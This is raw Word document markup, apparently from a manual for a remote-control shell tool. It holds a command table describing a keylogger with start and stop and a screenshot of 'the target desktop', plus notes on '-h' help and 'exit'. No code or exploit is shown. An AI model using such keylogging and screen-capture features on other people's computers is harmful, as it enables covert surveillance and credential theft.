    <w:p w:rsidR="00115C6F" w:rsidRDefault="00496124" w:rsidP="00115C6F">
      <w:r>
        <w:t>Windows</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00496124" w:rsidRDefault="00496124" w:rsidP="00496124">
      <w:pPr>
        <w:widowControl w:val="0"/>
        <w:autoSpaceDE w:val="0"/>
        <w:autoSpaceDN w:val="0"/>
        <w:adjustRightInd w:val="0"/>
        <w:spacing w:after="200" w:line="276" w:lineRule="auto"/>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:i/>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C4241" w:rsidTr="009C4241">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="4675" w:type="dxa"/>
          </w:tcPr>
          <w:p w:rsidR="009C4241" w:rsidRPr="00496124" w:rsidRDefault="009C4241" w:rsidP="009C4241">
            <w:pPr>
              <w:widowControl w:val="0"/>
              <w:autoSpaceDE w:val="0"/>
              <w:autoSpaceDN w:val="0"/>
              <w:adjustRightInd w:val="0"/>
              <w:spacing w:after="200" w:line="276" w:lineRule="auto"/>
              <w:jc w:val="center"/>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
                <w:i/>
                <w:lang w:val="en"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00496124">
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
                <w:i/>
                <w:lang w:val="en"/>
              </w:rPr>
              <w:t xml:space="preserve">keylogger </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
                <w:i/>
                <w:lang w:val="en"/>
              </w:rPr>
              <w:t>{</w:t>
            </w:r>
            <w:r w:rsidRPr="00496124">
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
                <w:i/>
                <w:lang w:val="en"/>
              </w:rPr>
              <w:t>start</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
                <w:i/>
                <w:lang w:val="en"/>
              </w:rPr>
              <w:t>,</w:t>
            </w:r>
            <w:r w:rsidR="00AE449A">
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
                <w:i/>
                <w:lang w:val="en"/>
              </w:rPr>
              <w:t xml:space="preserve"> </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
                <w:i/>
                <w:lang w:val="en"/>
              </w:rPr>
              <w:t>stop</w:t>
            </w:r>
            <w:r w:rsidR="00E5129B">
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
                <w:i/>
                <w:lang w:val="en"/>
              </w:rPr>
              <w:t>}</w:t>
            </w:r>
          </w:p>
          <w:p w:rsidR="009C4241" w:rsidRDefault="009C4241" w:rsidP="00496124">
            <w:pPr>
              <w:widowControl w:val="0"/>
              <w:autoSpaceDE w:val="0"/>
              <w:autoSpaceDN w:val="0"/>
              <w:adjustRightInd w:val="0"/>
              <w:spacing w:after="200" w:line="276" w:lineRule="auto"/>
              <w:jc w:val="center"/>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
                <w:i/>
                <w:lang w:val="en"/>
              </w:rPr>
            </w:pPr>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="4675" w:type="dxa"/>
          </w:tcPr>
          <w:p w:rsidR="009C4241" w:rsidRPr="009C4241" w:rsidRDefault="009C4241" w:rsidP="009C4241">
            <w:pPr>
              <w:widowControl w:val="0"/>
              <w:autoSpaceDE w:val="0"/>
              <w:autoSpaceDN w:val="0"/>
              <w:adjustRightInd w:val="0"/>
              <w:spacing w:after="200" w:line="276" w:lineRule="auto"/>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
                <w:lang w:val="en"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
                <w:lang w:val="en"/>
              </w:rPr>
              <w:lastRenderedPageBreak/>
              <w:t xml:space="preserve">Turn on and off the keylogger. After turning off a </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
                <w:lang w:val="en"/>
              </w:rPr>
              <w:lastRenderedPageBreak/>
              <w:t xml:space="preserve">log of the </w:t>
            </w:r>
            <w:proofErr w:type="gramStart"/>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
                <w:lang w:val="en"/>
              </w:rPr>
              <w:t>keys</w:t>
            </w:r>
            <w:proofErr w:type="gramEnd"/>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
                <w:lang w:val="en"/>
              </w:rPr>
              <w:t xml:space="preserve"> types will be displayed</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="009C4241" w:rsidTr="009C4241">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="4675" w:type="dxa"/>
          </w:tcPr>
          <w:p w:rsidR="009C4241" w:rsidRDefault="009C4241" w:rsidP="00496124">
            <w:pPr>
              <w:widowControl w:val="0"/>
              <w:autoSpaceDE w:val="0"/>
              <w:autoSpaceDN w:val="0"/>
              <w:adjustRightInd w:val="0"/>
              <w:spacing w:after="200" w:line="276" w:lineRule="auto"/>
              <w:jc w:val="center"/>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
                <w:i/>
                <w:lang w:val="en"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00496124">
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
                <w:i/>
                <w:lang w:val="en"/>
              </w:rPr>
              <w:lastRenderedPageBreak/>
              <w:t>screenshot</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="4675" w:type="dxa"/>
          </w:tcPr>
          <w:p w:rsidR="009C4241" w:rsidRPr="009C4241" w:rsidRDefault="009C4241" w:rsidP="009C4241">
            <w:pPr>
              <w:widowControl w:val="0"/>
              <w:autoSpaceDE w:val="0"/>
              <w:autoSpaceDN w:val="0"/>
              <w:adjustRightInd w:val="0"/>
              <w:spacing w:after="200" w:line="276" w:lineRule="auto"/>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
                <w:lang w:val="en"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
                <w:lang w:val="en"/>
              </w:rPr>
              <w:t>Take a screenshot of the target desktop</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w:rsidR="009C4241" w:rsidRDefault="009C4241" w:rsidP="00496124">
      <w:pPr>
        <w:widowControl w:val="0"/>
        <w:autoSpaceDE w:val="0"/>
        <w:autoSpaceDN w:val="0"/>
        <w:adjustRightInd w:val="0"/>
        <w:spacing w:after="200" w:line="276" w:lineRule="auto"/>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:i/>
          <w:lang w:val="en"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00496124" w:rsidRDefault="00496124" w:rsidP="00496124">
      <w:pPr>
        <w:widowControl w:val="0"/>
        <w:autoSpaceDE w:val="0"/>
        <w:autoSpaceDN w:val="0"/>
        <w:adjustRightInd w:val="0"/>
        <w:spacing w:after="200" w:line="276" w:lineRule="auto"/>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:i/>
          <w:lang w:val="en"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00496124" w:rsidRDefault="00496124" w:rsidP="00496124">
      <w:pPr>
        <w:widowControl w:val="0"/>
        <w:autoSpaceDE w:val="0"/>
        <w:autoSpaceDN w:val="0"/>
        <w:adjustRightInd w:val="0"/>
        <w:spacing w:after="200" w:line="276" w:lineRule="auto"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:lang w:val="en"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:lang w:val="en"/>
        </w:rPr>
        <w:t>You can get instructions of on how to use every command by using -h after the command. It will show you all the parameters that can be used to make the command function.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00496124" w:rsidRPr="00496124" w:rsidRDefault="00496124" w:rsidP="00496124">
      <w:pPr>
        <w:widowControl w:val="0"/>
        <w:autoSpaceDE w:val="0"/>
        <w:autoSpaceDN w:val="0"/>
        <w:adjustRightInd w:val="0"/>
        <w:spacing w:after="200" w:line="276" w:lineRule="auto"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:lang w:val="en"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00496124" w:rsidRPr="0070586C" w:rsidRDefault="00496124" w:rsidP="00115C6F">
      <w:r>
        <w:t xml:space="preserve"> To exit just type </w:t>
      </w:r>
      <w:r w:rsidRPr="00496124">
        <w:rPr>
          <w:i/>
        </w:rPr>
        <w:t>exit</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> on the shell.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="006E0C48" w:rsidRDefault="006E0C48" w:rsidP="006E0C48"/>
    <w:p w:rsidR="006E0C48" w:rsidRDefault="006E0C48" w:rsidP="006E0C48"/>
    <w:p w:rsidR="006E0C48" w:rsidRDefault="006E0C48" w:rsidP="006E0C48"/>
    <w:p w:rsidR="000C1E97" w:rsidRDefault="000C1E97"/>
    <w:p w:rsidR="000C1E97" w:rsidRDefault="000C1E97"/>
    <w:p w:rsidR="000C1E97" w:rsidRDefault="000C1E97"/>
    <w:sectPr w:rsidR="000C1E97">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A49" w:rsidRDefault="00CE4A49" w:rsidP="00DC4499">
      <w:pPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:separator/>
      </w:r>
    </w:p>
  </w:endnote>
  <w:endnote w:type="continuationSeparator" w:id="0">
    <w:p w:rsidR="00CE4A49" w:rsidRDefault="00CE4A49" w:rsidP="00DC4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A49" w:rsidRDefault="00CE4A49" w:rsidP="00DC4499">
      <w:pPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:separator/>
      </w:r>
    </w:p>
  </w:footnote>
  <w:footnote w:type="continuationSeparator" w:id="0">
    <w:p w:rsidR="00CE4A49" w:rsidRDefault="00CE4A49" w:rsidP="00DC4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499" w:rsidRDefault="00DC4499">
    <w:pPr>
      <w:pStyle w:val="Header"/>
    </w:pPr>
  </w:p>
  <w:p w:rsidR="00DC4499" w:rsidRDefault="00DC44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499"/>
    <w:rsid w:val="000C1E97"/>
    <w:rsid w:val="000E1899"/>
    <w:rsid w:val="00115C6F"/>
    <w:rsid w:val="00130F32"/>
    <w:rsid w:val="00152084"/>
    <w:rsid w:val="00214697"/>
    <w:rsid w:val="00496124"/>
    <w:rsid w:val="004F442A"/>
    <w:rsid w:val="004F65A3"/>
    <w:rsid w:val="006D7EA0"/>
    <w:rsid w:val="006E0C48"/>
    <w:rsid w:val="0070586C"/>
    <w:rsid w:val="007F320B"/>
    <w:rsid w:val="008D3980"/>
    <w:rsid w:val="00906C26"/>
    <w:rsid w:val="009C4241"/>
    <w:rsid w:val="009E493A"/>
    <w:rsid w:val="00AC1A1D"/>
    <w:rsid w:val="00AE449A"/>
    <w:rsid w:val="00CE4A49"/>
    <w:rsid w:val="00DC4499"/>
    <w:rsid w:val="00E51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5D169-0927-4A5A-82F6-DD48030A9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4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499"/>
  </w:style>
  <w:style w:type="paragraph" w:styleId="Footer">
    <w:name w:val="footer"/>
    <w:basedOn w:val="Normal"/>
    <w:link w:val="FooterChar"/>
    <w:uiPriority w:val="99"/>
    <w:unhideWhenUsed/>
    <w:rsid w:val="00DC44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499"/>
  </w:style>
  <w:style w:type="table" w:styleId="TableGrid">
    <w:name w:val="Table Grid"/>
    <w:basedOn w:val="TableNormal"/>
    <w:uiPriority w:val="39"/>
    <w:rsid w:val="009C4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512</Words>
  <Characters>2708</Characters>
  <Application>Microsoft Office Word</Application>
  <DocSecurity>4</DocSecurity>
  <Lines>117</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de la Torre</dc:creator>
  <cp:keywords/>
  <dc:description/>
  <cp:lastModifiedBy>John Abraham</cp:lastModifiedBy>
  <cp:revision>2</cp:revision>
  <dcterms:created xsi:type="dcterms:W3CDTF">2019-02-18T20:48:00Z</dcterms:created>
  <dcterms:modified xsi:type="dcterms:W3CDTF">2019-02-18T20:48:00Z</dcterms:modified>
</cp:coreProperties>
</file>